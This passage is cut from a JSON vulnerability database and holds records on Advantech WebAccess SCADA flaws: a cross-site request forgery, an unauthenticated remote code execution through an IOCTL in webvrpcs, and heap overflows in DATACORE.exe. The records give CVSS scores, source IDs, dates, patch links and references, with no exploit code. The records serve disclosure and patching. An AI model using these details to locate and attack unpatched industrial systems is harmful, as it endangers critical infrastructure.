"url": "http://www.securityfocus.com/bid/52051" }, { "trust": 0.8, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2012-0235" }, { "trust": 0.8, "url": "http://www.us-cert.gov/control_systems/pdf/icsa-12-047-01a.pdf" }, { "trust": 0.8, "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2012-0235" }, { "trust": 0.4, "url": "http://www.us-cert.gov/control_systems/pdf/icsa-11-279-01.pdf" }, { "trust": 0.3, "url": "http://webaccess.advantech.com/product.php" }, { "trust": 0.1, "url": "https://ca.secunia.com/?page=viewadvisory\u0026vuln_id=46775" }, { "trust": 0.1, "url": "http://secunia.com/vulnerability_intelligence/" }, { "trust": 0.1, "url": "http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/" }, { "trust": 0.1, "url": "http://secunia.com/advisories/secunia_security_advisories/" }, { "trust": 0.1, "url": "http://secunia.com/advisories/about_secunia_advisories/" }, { "trust": 0.1, "url": "http://secunia.com/vulnerability_scanning/personal/" }, { "trust": 0.1, "url": "http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org" }, { "trust": 0.1, "url": "http://secunia.com/products/corporate/vim/ovum_2011_request/" }, { "trust": 0.1, "url": "http://secunia.com/advisories/46775/" }, { "trust": 0.1, "url": "http://secunia.com/advisories/46775/#comments" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2012-0664" }, { "db": "VULHUB", "id": "VHN-53516" }, { "db": "BID", "id": "52051" }, { "db": "JVNDB", "id": "JVNDB-2012-001553" }, { "db": "PACKETSTORM", "id": "106765" }, { "db": "CNNVD", "id": "CNNVD-201202-411" }, { "db": "NVD", "id": "CVE-2012-0235" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "IVD", "id": "197d942a-2354-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2012-0664" }, { "db": "VULHUB", "id": "VHN-53516" }, { "db": "BID", "id": "52051" }, { "db": "JVNDB", "id": "JVNDB-2012-001553" }, { "db": "PACKETSTORM", "id": "106765" }, { "db": "CNNVD", "id": "CNNVD-201202-411" }, { "db": "NVD", "id": "CVE-2012-0235" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2012-02-20T00:00:00", "db": "IVD", "id": "197d942a-2354-11e6-abef-000c29c66e3d" }, { "date": "2012-02-20T00:00:00", "db": "CNVD", "id": "CNVD-2012-0664" }, { "date": "2012-02-21T00:00:00", "db": "VULHUB", "id": "VHN-53516" }, { "date": "2012-02-16T00:00:00", "db": "BID", "id": "52051" }, { "date": "2012-02-23T00:00:00", "db": "JVNDB", "id": "JVNDB-2012-001553" }, { "date": "2011-11-09T12:04:37", "db": "PACKETSTORM", "id": "106765" }, { "date": "2012-02-22T00:00:00", "db": "CNNVD", "id": "CNNVD-201202-411" }, { "date": "2012-02-21T13:31:57", "db": "NVD", "id": "CVE-2012-0235" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2012-02-20T00:00:00", "db": "CNVD", "id": "CNVD-2012-0664" }, { "date": "2018-01-05T00:00:00", "db": "VULHUB", "id": "VHN-53516" }, { "date": "2012-02-16T00:00:00", "db": "BID", "id": "52051" }, { "date": "2012-02-23T00:00:00", "db": "JVNDB", "id": "JVNDB-2012-001553" }, { "date": "2012-02-22T00:00:00", "db": "CNNVD", "id": "CNNVD-201202-411" }, { "date": "2024-11-21T01:34:38.163000", "db": "NVD", "id": "CVE-2012-0235" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "CNNVD", "id": "CNNVD-201202-411" } ], "trust": 0.6 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Advantech/BroadWin WebAccess Vulnerable to cross-site request forgery", "sources": [ { "db": "JVNDB", "id": "JVNDB-2012-001553" } ], "trust": 0.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "cross-site request forgery", "sources": [ { "db": "CNNVD", "id": "CNNVD-201202-411" } ], "trust": 0.6 } }
var-201903-1777
Vulnerability from variot
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Advantech WebAccess Node. Authentication is not required to exploit this vulnerability.The specific flaw exists within spchapi.exe, which is accessed through the 0x2711 IOCTL in the webvrpcs process. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of Administrator.
Show details on source website{ "affected_products": { "_id": null, "data": [ { "_id": null, "model": "webaccess", "scope": null, "trust": 0.7, "vendor": "advantech", "version": null } ], "sources": [ { "db": "ZDI", "id": "ZDI-19-292" } ] }, "credits": { "_id": null, "data": "Mat Powell of Trend Micro Zero Day Initiative", "sources": [ { "db": "ZDI", "id": "ZDI-19-292" } ], "trust": 0.7 }, "cvss": { "_id": null, "data": [ { "cvssV2": [], "cvssV3": [ { "attackComplexity": "LOW", "attackVector": "NETWORK", "author": "ZDI", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "exploitabilityScore": 3.9, "id": "ZDI-19-292", "impactScore": 5.9, "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "trust": 0.7, "userInteraction": "NONE", "vectorString": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0" } ], "severity": [ { "author": "ZDI", "id": "ZDI-19-292", "trust": 0.7, "value": "CRITICAL" } ] } ], "sources": [ { "db": "ZDI", "id": "ZDI-19-292" } ] }, "description": { "_id": null, "data": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Advantech WebAccess Node. Authentication is not required to exploit this vulnerability.The specific flaw exists within spchapi.exe, which is accessed through the 0x2711 IOCTL in the webvrpcs process. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of Administrator.", "sources": [ { "db": "ZDI", "id": "ZDI-19-292" } ], "trust": 0.7 }, "external_ids": { "_id": null, "data": [ { "db": "ZDI_CAN", "id": "ZDI-CAN-7907", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-19-292", "trust": 0.7 } ], "sources": [ { "db": "ZDI", "id": "ZDI-19-292" } ] }, "id": "VAR-201903-1777", "iot": { "_id": null, "data": true, "sources": [ { "db": "VARIoT devices database", "id": null } ], "trust": 0.41739574 }, "last_update_date": "2022-05-17T01:47:51.129000Z", "sources": { "_id": null, "data": [ { "db": "ZDI", "id": "ZDI-19-292", "ident": null } ] }, "sources_release_date": { "_id": null, "data": [ { "date": "2019-03-28T00:00:00", "db": "ZDI", "id": "ZDI-19-292", "ident": null } ] }, "sources_update_date": { "_id": null, "data": [ { "date": "2019-03-28T00:00:00", "db": "ZDI", "id": "ZDI-19-292", "ident": null } ] }, "title": { "_id": null, "data": "Advantech WebAccess Node spchapi Improper Access Control Remote Code Execution Vulnerability", "sources": [ { "db": "ZDI", "id": "ZDI-19-292" } ], "trust": 0.7 } }
var-202005-0008
Vulnerability from variot
Advantech WebAccess Node, Version 8.4.4 and prior, Version 9.0.0. Multiple heap-based buffer overflow vulnerabilities exist caused by a lack of proper validation of the length of user-supplied data, which may allow remote code execution. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Advantech WebAccess/SCADA. Authentication is not required to exploit this vulnerability.The specific flaw exists within the implementation of IOCTL 0x0000791d in DATACORE.exe. An attacker can leverage this vulnerability to execute code in the context of Administrator. Advantech WebAccess is a browser-based SCADA software package for monitoring, data acquisition, and visualization. It is used to automate complex industrial processes when remote operation is required
Show details on source website{ "affected_products": { "_id": null, "data": [ { "_id": null, "model": "webaccess/scada", "scope": null, "trust": 9.1, "vendor": "advantech", "version": null }, { "_id": null, "model": "webaccess", "scope": "lte", "trust": 1.0, "vendor": "advantech", "version": "8.4.4" }, { "_id": null, "model": "webaccess", "scope": "eq", "trust": 1.0, "vendor": "advantech", "version": "9.0.0" }, { "_id": null, "model": "webaccess node", "scope": "gte", "trust": 0.6, "vendor": "advantech", "version": "8.4.4" }, { "_id": null, "model": "webaccess node", "scope": "eq", "trust": 0.6, "vendor": "advantech", "version": "9.0.0" }, { "_id": null, "model": null, "scope": "eq", "trust": 0.4, "vendor": "webaccess", "version": "*" }, { "_id": null, "model": null, "scope": "eq", "trust": 0.4, "vendor": "webaccess", "version": "9.0.0" } ], "sources": [ { "db": "IVD", "id": "95f15ed9-abd1-4fa7-b3b8-cce038c93754" }, { "db": "IVD", "id": "619b16c7-a995-4cdf-b7be-d91e2bdc75ec" }, { "db": "ZDI", "id": "ZDI-20-593" }, { "db": "ZDI", "id": "ZDI-20-597" }, { "db": "ZDI", "id": "ZDI-20-599" }, { "db": "ZDI", "id": "ZDI-20-631" }, { "db": "ZDI", "id": "ZDI-20-603" }, { "db": "ZDI", "id": "ZDI-20-604" }, { "db": "ZDI", "id": "ZDI-20-601" }, { "db": "ZDI", "id": "ZDI-20-600" }, { "db": "ZDI", "id": "ZDI-20-621" }, { "db": "ZDI", "id": "ZDI-20-618" }, { "db": "ZDI", "id": "ZDI-20-602" }, { "db": "ZDI", "id": "ZDI-20-623" }, { "db": "ZDI", "id": "ZDI-20-616" }, { "db": "CNVD", "id": "CNVD-2020-29739" }, { "db": "NVD", "id": "CVE-2020-10638" } ] }, "credits": { "_id": null, "data": "Z0mb1E", "sources": [ { "db": "ZDI", "id": "ZDI-20-593" }, { "db": "ZDI", "id": "ZDI-20-597" }, { "db": "ZDI", "id": "ZDI-20-599" }, { "db": "ZDI", "id": "ZDI-20-631" }, { "db": "ZDI", "id": "ZDI-20-603" }, { "db": "ZDI", "id": "ZDI-20-604" }, { "db": "ZDI", "id": "ZDI-20-601" }, { "db": "ZDI", "id": "ZDI-20-600" }, { "db": "ZDI", "id": "ZDI-20-621" }, { "db": "ZDI", "id": "ZDI-20-618" }, { "db": "ZDI", "id": "ZDI-20-602" }, { "db": "ZDI", "id": "ZDI-20-623" }, { "db": "ZDI", "id": "ZDI-20-616" } ], "trust": 9.1 }, "cve": "CVE-2020-10638", "cvss": { "_id": null, "data": [ { "cvssV2": [ { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "nvd@nist.gov", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "CVE-2020-10638", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 1.1, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "CNVD", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "CNVD-2020-29739", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 0.6, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "IVD", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "95f15ed9-abd1-4fa7-b3b8-cce038c93754", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 0.2, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.9 [IVD]" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "IVD", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "619b16c7-a995-4cdf-b7be-d91e2bdc75ec", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 0.2, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.9 [IVD]" } ], "cvssV3": [ { "attackComplexity": "LOW", "attackVector": "NETWORK", "author": "ZDI", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "exploitabilityScore": 3.9, "id": "CVE-2020-10638", "impactScore": 5.9, "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "trust": 9.1, "userInteraction": "NONE", "vectorString": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0" }, { "attackComplexity": "LOW", "attackVector": "NETWORK", "author": "nvd@nist.gov", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "exploitabilityScore": 3.9, "id": "CVE-2020-10638", "impactScore": 5.9, "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "trust": 1.0, "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" } ], "severity": [ { "author": "ZDI", "id": "CVE-2020-10638", "trust": 9.1, "value": "CRITICAL" }, { "author": "nvd@nist.gov", "id": "CVE-2020-10638", "trust": 1.0, "value": "CRITICAL" }, { "author": "CNVD", "id": "CNVD-2020-29739", "trust": 0.6, "value": "HIGH" }, { "author": "CNNVD", "id": "CNNVD-202005-295", "trust": 0.6, "value": "CRITICAL" }, { "author": "IVD", "id": "95f15ed9-abd1-4fa7-b3b8-cce038c93754", "trust": 0.2, "value": "HIGH" }, { "author": "IVD", "id": "619b16c7-a995-4cdf-b7be-d91e2bdc75ec", "trust": 0.2, "value": "HIGH" }, { "author": "VULMON", "id": "CVE-2020-10638", "trust": 0.1, "value": "HIGH" } ] } ], "sources": [ { "db": "IVD", "id": "95f15ed9-abd1-4fa7-b3b8-cce038c93754" }, { "db": "IVD", "id": "619b16c7-a995-4cdf-b7be-d91e2bdc75ec" }, { "db": "ZDI", "id": "ZDI-20-593" }, { "db": "ZDI", "id": "ZDI-20-597" }, { "db": "ZDI", "id": "ZDI-20-599" }, { "db": "ZDI", "id": "ZDI-20-631" }, { "db": "ZDI", "id": "ZDI-20-603" }, { "db": "ZDI", "id": "ZDI-20-604" }, { "db": "ZDI", "id": "ZDI-20-601" }, { "db": "ZDI", "id": "ZDI-20-600" }, { "db": "ZDI", "id": "ZDI-20-621" }, { "db": "ZDI", "id": "ZDI-20-618" }, { "db": "ZDI", "id": "ZDI-20-602" }, { "db": "ZDI", "id": "ZDI-20-623" }, { "db": "ZDI", "id": "ZDI-20-616" }, { "db": "CNVD", "id": "CNVD-2020-29739" }, { "db": "VULMON", "id": "CVE-2020-10638" }, { "db": "CNNVD", "id": "CNNVD-202005-295" }, { "db": "NVD", "id": "CVE-2020-10638" } ] }, "description": { "_id": null, "data": "Advantech WebAccess Node, Version 8.4.4 and prior, Version 9.0.0. Multiple heap-based buffer overflow vulnerabilities exist caused by a lack of proper validation of the length of user-supplied data, which may allow remote code execution. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Advantech WebAccess/SCADA. Authentication is not required to exploit this vulnerability.The specific flaw exists within the implementation of IOCTL 0x0000791d in DATACORE.exe. An attacker can leverage this vulnerability to execute code in the context of Administrator. Advantech WebAccess is a browser-based SCADA software package for monitoring, data acquisition, and visualization. It is used to automate complex industrial processes when remote operation is required", "sources": [ { "db": "NVD", "id": "CVE-2020-10638" }, { "db": "ZDI", "id": "ZDI-20-601" }, { "db": "ZDI", "id": "ZDI-20-616" }, { "db": "ZDI", "id": "ZDI-20-623" }, { "db": "ZDI", "id": "ZDI-20-602" }, { "db": "ZDI", "id": "ZDI-20-618" }, { "db": "ZDI", "id": "ZDI-20-621" }, { "db": "ZDI", "id": "ZDI-20-600" }, { "db": "ZDI", "id": "ZDI-20-604" }, { "db": "ZDI", "id": "ZDI-20-603" }, { "db": "ZDI", "id": "ZDI-20-631" }, { "db": "ZDI", "id": "ZDI-20-599" }, { "db": "ZDI", "id": "ZDI-20-597" }, { "db": "ZDI", "id": "ZDI-20-593" }, { "db": "CNVD", "id": "CNVD-2020-29739" }, { "db": "IVD", "id": "619b16c7-a995-4cdf-b7be-d91e2bdc75ec" }, { "db": "IVD", "id": "95f15ed9-abd1-4fa7-b3b8-cce038c93754" }, { "db": "VULMON", "id": "CVE-2020-10638" } ], "trust": 10.08 }, "external_ids": { "_id": null, "data": [ { "db": "NVD", "id": "CVE-2020-10638", "trust": 11.8 }, { "db": "ZDI", "id": "ZDI-20-593", "trust": 2.4 }, { "db": "ZDI", "id": "ZDI-20-599", "trust": 2.4 }, { "db": "ZDI", "id": "ZDI-20-603", "trust": 2.4 }, { "db": "ZDI", "id": "ZDI-20-600", "trust": 2.4 }, { "db": "ZDI", "id": "ZDI-20-621", "trust": 2.4 }, { "db": "ZDI", "id": "ZDI-20-616", "trust": 2.4 }, { "db": "ICS CERT", "id": "ICSA-20-128-01", "trust": 2.3 }, { "db": "CNVD", "id": "CNVD-2020-29739", "trust": 1.0 }, { "db": "CNNVD", "id": "CNNVD-202005-295", "trust": 1.0 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-9902", "trust": 0.7 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-9985", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-20-597", "trust": 0.7 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-9994", "trust": 0.7 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-9892", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-20-631", "trust": 0.7 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-9897", "trust": 0.7 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-9898", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-20-604", "trust": 0.7 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-9998", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-20-601", "trust": 0.7 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-9997", "trust": 0.7 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-10085", "trust": 0.7 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-9891", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-20-618", "trust": 0.7 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-9895", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-20-602", "trust": 0.7 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-10337", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-20-623", "trust": 0.7 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-9889", "trust": 0.7 }, { "db": "NSFOCUS", "id": "47382", "trust": 0.6 }, { "db": "ZDI", "id": "ZDI-20-635", "trust": 0.6 }, { "db": "AUSCERT", "id": "ESB-2020.1646", "trust": 0.6 }, { "db": "IVD", "id": "95F15ED9-ABD1-4FA7-B3B8-CCE038C93754", "trust": 0.2 }, { "db": "IVD", "id": "619B16C7-A995-4CDF-B7BE-D91E2BDC75EC", "trust": 0.2 }, { "db": "VULMON", "id": "CVE-2020-10638", "trust": 0.1 } ], "sources": [ { "db": "IVD", "id": "95f15ed9-abd1-4fa7-b3b8-cce038c93754" }, { "db": "IVD", "id": "619b16c7-a995-4cdf-b7be-d91e2bdc75ec" }, { "db": "ZDI", "id": "ZDI-20-593" }, { "db": "ZDI", "id": "ZDI-20-597" }, { "db": "ZDI", "id": "ZDI-20-599" }, { "db": "ZDI", "id": "ZDI-20-631" }, { "db": "ZDI", "id": "ZDI-20-603" }, { "db": "ZDI", "id": "ZDI-20-604" }, { "db": "ZDI", "id": "ZDI-20-601" }, { "db": "ZDI", "id": "ZDI-20-600" }, { "db": "ZDI", "id": "ZDI-20-621" }, { "db": "ZDI", "id": "ZDI-20-618" }, { "db": "ZDI", "id": "ZDI-20-602" }, { "db": "ZDI", "id": "ZDI-20-623" }, { "db": "ZDI", "id": "ZDI-20-616" }, { "db": "CNVD", "id": "CNVD-2020-29739" }, { "db": "VULMON", "id": "CVE-2020-10638" }, { "db": "CNNVD", "id": "CNNVD-202005-295" }, { "db": "NVD", "id": "CVE-2020-10638" } ] }, "id": "VAR-202005-0008", "iot": { "_id": null, "data": true, "sources": [ { "db": "IVD", "id": "95f15ed9-abd1-4fa7-b3b8-cce038c93754" }, { "db": "IVD", "id": "619b16c7-a995-4cdf-b7be-d91e2bdc75ec" }, { "db": "CNVD", "id": "CNVD-2020-29739" } ], "trust": 1.5795034866666668 }, "iot_taxonomy": { "_id": null, "data": [ { "category": [ "ICS" ], "sub_category": null, "trust": 1.0 } ], "sources": [ { "db": "IVD", "id": "95f15ed9-abd1-4fa7-b3b8-cce038c93754" }, { "db": "IVD", "id": "619b16c7-a995-4cdf-b7be-d91e2bdc75ec" }, { "db": "CNVD", "id": "CNVD-2020-29739" } ] }, "last_update_date": "2024-11-29T22:41:10.312000Z", "patch": { "_id": null, "data": [ { "title": "Advantech has issued an update to correct this vulnerability.", "trust": 9.1, "url": "https://www.us-cert.gov/ics/advisories/icsa-20-128-36" }, { "title": "Patch for Advantech WebAccess Node buffer overflow vulnerability (CNVD-2020-29739)", "trust": 0.6, "url": "https://www.cnvd.org.cn/patchInfo/show/218845" }, { "title": "Advantech WebAccess Node Buffer error vulnerability fix", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=118647" } ], "sources": [ { "db": "ZDI", "id": "ZDI-20-593" }, { "db": "ZDI", "id": "ZDI-20-597" }, { "db": "ZDI", "id": "ZDI-20-599" }, { "db": "ZDI", "id": "ZDI-20-631" }, { "db": "ZDI", "id": "ZDI-20-603" }, { "db": "ZDI", "id": "ZDI-20-604" }, { "db": "ZDI", "id": "ZDI-20-601" }, { "db": "ZDI", "id": "ZDI-20-600" }, { "db": "ZDI", "id": "ZDI-20-621" }, { "db": "ZDI", "id": "ZDI-20-618" }, { "db": "ZDI", "id": "ZDI-20-602" }, { "db": "ZDI", "id": "ZDI-20-623" }, { "db": "ZDI", "id": "ZDI-20-616" }, { "db": "CNVD", "id": "CNVD-2020-29739" }, { "db": "CNNVD", "id": "CNNVD-202005-295" } ] }, "problemtype_data": { "_id": null, "data": [ { "problemtype": "CWE-122", "trust": 1.0 }, { "problemtype": "CWE-787", "trust": 1.0 } ], "sources": [ { "db": "NVD", "id": "CVE-2020-10638" } ] }, "references": { "_id": null, "data": [ { "trust": 9.1, "url": "https://www.us-cert.gov/ics/advisories/icsa-20-128-36" }, { "trust": 2.9, "url": "https://www.us-cert.gov/ics/advisories/icsa-20-128-01" }, { "trust": 1.7, "url": "https://www.zerodayinitiative.com/advisories/zdi-20-593/" }, { "trust": 1.7, "url": "https://www.zerodayinitiative.com/advisories/zdi-20-599/" }, { "trust": 1.7, "url": "https://www.zerodayinitiative.com/advisories/zdi-20-600/" }, { "trust": 1.7, "url": "https://www.zerodayinitiative.com/advisories/zdi-20-603/" }, { "trust": 1.7, "url": "https://www.zerodayinitiative.com/advisories/zdi-20-616/" }, { "trust": 1.7, "url": "https://www.zerodayinitiative.com/advisories/zdi-20-621/" }, { "trust": 0.6, "url": "https://www.zerodayinitiative.com/advisories/zdi-20-635/" }, { "trust": 0.6, "url": "https://nvd.nist.gov/vuln/detail/cve-2020-10638" }, { "trust": 0.6, "url": "http://www.nsfocus.net/vulndb/47382" }, { "trust": 0.6, "url": "https://www.auscert.org.au/bulletins/esb-2020.1646/" }, { "trust": 0.1, "url": "https://cwe.mitre.org/data/definitions/787.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov" }, { "trust": 0.1, "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/181596" } ], "sources": [ { "db": "ZDI", "id": "ZDI-20-593" }, { "db": "ZDI", "id": "ZDI-20-597" }, { "db": "ZDI", "id": "ZDI-20-599" }, { "db": "ZDI", "id": "ZDI-20-631" }, { "db": "ZDI", "id": "ZDI-20-603" }, { "db": "ZDI", "id": "ZDI-20-604" }, { "db": "ZDI", "id": "ZDI-20-601" }, { "db": "ZDI", "id": "ZDI-20-600" }, { "db": "ZDI", "id": "ZDI-20-621" }, { "db": "ZDI", "id": "ZDI-20-618" }, { "db": "ZDI", "id": "ZDI-20-602" }, { "db": "ZDI", "id": "ZDI-20-623" }, { "db": "ZDI", "id": "ZDI-20-616" }, { "db": "CNVD", "id": "CNVD-2020-29739" }, { "db": "VULMON", "id": "CVE-2020-10638" }, { "db": "CNNVD", "id": "CNNVD-202005-295" }, { "db": "NVD", "id": "CVE-2020-10638" } ] }, "sources": { "_id": null, "data": [ { "db": "IVD", "id": "95f15ed9-abd1-4fa7-b3b8-cce038c93754", "ident": null }, { "db": "IVD", "id": "619b16c7-a995-4cdf-b7be-d91e2bdc75ec", "ident": null }, { "db": "ZDI", "id": "ZDI-20-593", "ident": null }, { "db": "ZDI", "id": "ZDI-20-597", "ident": null }, { "db": "ZDI", "id": "ZDI-20-599", "ident": null }, { "db": "ZDI", "id": "ZDI-20-631", "ident": null }, { "db": "ZDI", "id": "ZDI-20-603", "ident": null }, { "db": "ZDI", "id": "ZDI-20-604", "ident": null }, { "db": "ZDI", "id": "ZDI-20-601", "ident": null }, { "db": "ZDI", "id": "ZDI-20-600", "ident": null }, { "db": "ZDI", "id": "ZDI-20-621", "ident": null }, { "db": "ZDI", "id": "ZDI-20-618", "ident": null }, { "db": "ZDI", "id": "ZDI-20-602", "ident": null }, { "db": "ZDI", "id": "ZDI-20-623", "ident": null }, { "db": "ZDI", "id": "ZDI-20-616", "ident": null }, { "db": "CNVD", "id": "CNVD-2020-29739", "ident": null }, { "db": "VULMON", "id": "CVE-2020-10638", "ident": null }, { "db": "CNNVD", "id": "CNNVD-202005-295", "ident": null }, { "db": "NVD", "id": "CVE-2020-10638", "ident": null } ] }, "sources_release_date": { "_id": null, "data": [ { "date": "2020-05-07T00:00:00", "db": "IVD", "id": "95f15ed9-abd1-4fa7-b3b8-cce038c93754", "ident": null }, { "date": "2020-05-07T00:00:00", "db": "IVD", "id": "619b16c7-a995-4cdf-b7be-d91e2bdc75ec", "ident": null }, { "date": "2020-05-08T00:00:00", "db": "ZDI", "id": "ZDI-20-593", "ident": null }, { "date": "2020-05-08T00:00:00", "db": "ZDI", "id": "ZDI-20-597", "ident": null }, { "date": "2020-05-08T00:00:00", "db": "ZDI", "id": "ZDI-20-599", "ident": null }, { "date": "2020-05-08T00:00:00", "db": "ZDI", "id": "ZDI-20-631", "ident": null }, { "date": "2020-05-08T00:00:00", "db": "ZDI", "id": "ZDI-20-603", "ident": null }, { "date": "2020-05-08T00:00:00", "db": "ZDI", "id": "ZDI-20-604", "ident": null }, { "date": "2020-05-08T00:00:00", "db": "ZDI", "id": "ZDI-20-601", "ident": null }, { "date": "2020-05-08T00:00:00", "db": "ZDI", "id": "ZDI-20-600", "ident": null }, { "date": "2020-05-08T00:00:00", "db": "ZDI", "id": "ZDI-20-621", "ident": null }, { "date": "2020-05-08T00:00:00", "db": "ZDI", "id": "ZDI-20-618", "ident": null }, { "date": "2020-05-08T00:00:00", "db": "ZDI", "id": "ZDI-20-602", "ident": null }, { "date": "2020-05-08T00:00:00", "db": "ZDI", "id": "ZDI-20-623", "ident": null }, { "date": "2020-05-08T00:00:00", "db": "ZDI", "id": "ZDI-20-616", "ident": null }, { "date": "2020-05-25T00:00:00", "db": "CNVD", "id": "CNVD-2020-29739", "ident": null }, { "date": "2020-05-08T00:00:00", "db": "VULMON", "id": "CVE-2020-10638", "ident": null }, { "date": "2020-05-07T00:00:00", "db": "CNNVD", "id": "CNNVD-202005-295", "ident": null }, { "date": "2020-05-08T12:15:11.067000", "db": "NVD", "id": "CVE-2020-10638", "ident": null } ] }, "sources_update_date": { "_id": null, "data": [ { "date": "2020-05-08T00:00:00", "db": "ZDI", "id": "ZDI-20-593", "ident": null }, { "date": "2020-05-08T00:00:00", "db": "ZDI", "id": "ZDI-20-597", "ident": null }, { "date": "2020-05-08T00:00:00", "db": "ZDI", "id": "ZDI-20-599", "ident": null }, { "date": "2020-05-08T00:00:00", "db": "ZDI", "id": "ZDI-20-631", "ident": null }, { "date": "2020-05-08T00:00:00", "db": "ZDI", "id": "ZDI-20-603", "ident": null }, { "date": "2020-05-08T00:00:00", "db": "ZDI", "id": "ZDI-20-604", "ident": null }, { "date": "2020-05-08T00:00:00", "db": "ZDI", "id": "ZDI-20-601", "ident": null }, { "date": "2020-05-08T00:00:00", "db": "ZDI", "id": "ZDI-20-600", "ident": null }, { "date": "2020-05-08T00:00:00", "db": "ZDI", "id": "ZDI-20-621", "ident": null }, { "date": "2020-05-08T00:00:00", "db": "ZDI", "id": "ZDI-20-618", "ident": null }, { "date": "2020-05-08T00:00:00", "db": "ZDI", "id": "ZDI-20-602", "ident": null }, { "date": "2020-05-08T00:00:00", "db": "ZDI", "id": "ZDI-20-623", "ident": null }, { "date": "2020-05-08T00:00:00", "db": "ZDI", "id": "ZDI-20-616", "ident": null }, { "date": "2020-05-25T00:00:00", "db": "CNVD", "id": "CNVD-2020-29739", "ident": null }, { "date": "2020-05-12T00:00:00", "db": "VULMON", "id": "CVE-2020-10638", "ident": null }, { "date": "2021-01-04T00:00:00", "db": "CNNVD", "id": "CNNVD-202005-295", "ident": null }, { "date": "2024-11-21T04:55:45.027000", 